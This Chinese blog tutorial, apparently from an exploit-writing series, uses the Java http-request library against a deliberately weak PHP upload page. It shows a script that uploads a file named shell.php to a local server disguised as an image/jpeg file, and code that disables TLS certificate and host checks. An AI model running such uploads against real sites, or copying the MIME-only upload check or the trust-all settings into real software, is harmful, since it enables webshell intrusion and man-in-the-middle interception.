当前位置: 首页 > article >正文

JAVA-Exploit编写(6)--http-request库文件上传使用

article 2025/1/20 14:14:51

目录

1.http-request简介

2. 依赖导入

3.文件上传页面代码

4. http-request文件上传简单使用

 5.请求https的网站解决SSL证书的问题

5. 1 直接请求带https域名的网站

5.2 信任所有证书

1.http-request简介

        http-request 是一个库 里面提供很多方法,使得很容易就可以构造http请求,相比于之前使用的标准库类等要简单使用很多,目前通过此库来编写EXP较多.

2. 依赖导入

<dependency>
      <groupId>com.github.kevinsawicki</groupId>
      <artifactId>http-request</artifactId>
      <version>5.6</version>
</dependency>

3.文件上传页面代码

<?php
if (($_FILES["file"]["type"] == "image/gif" || $_FILES["file"]["type"] == "image/jpeg" || $_FILES["file"]["type"] == "image/png") && $_FILES["file"]["size"] < 20000) {
    if ($_FILES["file"]["error"] > 0) {
        echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
        echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
        echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";
    } else {
        if (file_exists("uploads/" . $_FILES["file"]["name"])) {
            echo $_FILES["file"]["name"] . " already exists. ";
        } else {
            move_uploaded_file($_FILES["file"]["tmp_name"], "uploads/" . $_FILES["file"]["name"]);
            echo "Stored in: " . "uploads/" . $_FILES["file"]["name"];
        }
    }
} else {
    echo "Invalid file";
}
?>

4. http-request文件上传简单使用

  相比于之前使用的标准库和httpcomponents库来说,使用起来简单很多,通过设置文件头和.part方法即可,一看就懂.

package com.deger.HttpRequest;

import com.github.kevinsawicki.http.HttpRequest;

import java.io.File;

public class HttpRequestUpload {
    public static void main(String[] args) {
        // 文件上传
        HttpRequest httpRequest = HttpRequest.post("http://127.0.0.1/upload.php");
        // 设置请求头的文件类型
        httpRequest.header( "content-Type","multipart/form-data;boundary=AaB03x");
        // 设置上传的文件 以及上传文件位置
        httpRequest.part("file","test123.php","image/jpeg",new File("D:\\phpstudy_pro\\WWW\\shell.php"));
        // 接收响应信息
        System.out.println(httpRequest.body());

    }
}

 5.请求https的网站解决SSL证书的问题

5. 1 直接请求带https域名的网站

package com.deger.HttpRequest;


import com.github.kevinsawicki.http.HttpRequest;

public class HttpRequestSsl {
    public static void main(String[] args) {
        HttpRequest httpRequest = HttpRequest.get("https://www.xxxxxx.com");
        System.out.println(httpRequest.body());
    }
}

5.2 信任所有证书

 只需要使用两个方法就可以正常使用了

package com.deger.HttpRequest;


import com.github.kevinsawicki.http.HttpRequest;

public class HttpRequestSsl {
    public static void main(String[] args) {
        HttpRequest httpRequest = HttpRequest.get("https://www.xxxxx.com");
        //信息所有证书和主机
        httpRequest.trustAllCerts();
        httpRequest.trustAllHosts();
        System.out.println(httpRequest.body());
    }
}

 


http://www.kler.cn/a/510772.html

相关文章:

  • 25/1/15 嵌入式笔记 初学STM32F108
  • 人工智能之数学基础:线性代数中的线性相关和线性无关
  • 【机器学习实战入门】基于深度学习的乳腺癌分类
  • Flink开发中的优化方案
  • Go语言之路————条件控制:if、for、switch
  • 汽车网络信息安全-ISO/SAE 21434解析(上)
  • 人机交互(包含推荐软件)
  • STM32 中 GPIO 的八种工作模式介绍
  • 第5章:Python TDD定义Dollar对象相等性
  • pnpm安装
  • AUTOSAR从入门到精通-【自动驾驶】高精地图(五)
  • 接口测试自动化实战(超详细的)
  • 若依框架搭建学习
  • Electron实践继续
  • 使用 Helm 安装 Redis 集群
  • 自制游戏——国争
  • JavaScript系列(33)--微前端架构详解
  • C语言之装甲车库车辆动态监控辅助记录系统
  • 第一次在Gitee建仓传码
  • 迈向 “全能管家” 之路:机器人距离终极蜕变还需几步?
  • 多平台下Informatica在医疗数据抽取中的应用
  • SpringCloud -根据服务名获取服务运行实例并进行负载均衡
  • 中型项目中 HTTP 的挑战与解决方案
  • 大型系统中 HTTP 的优化与部署
  • STM32使用DSP库 Keil方式添加
  • 数据可视化大屏设计与实现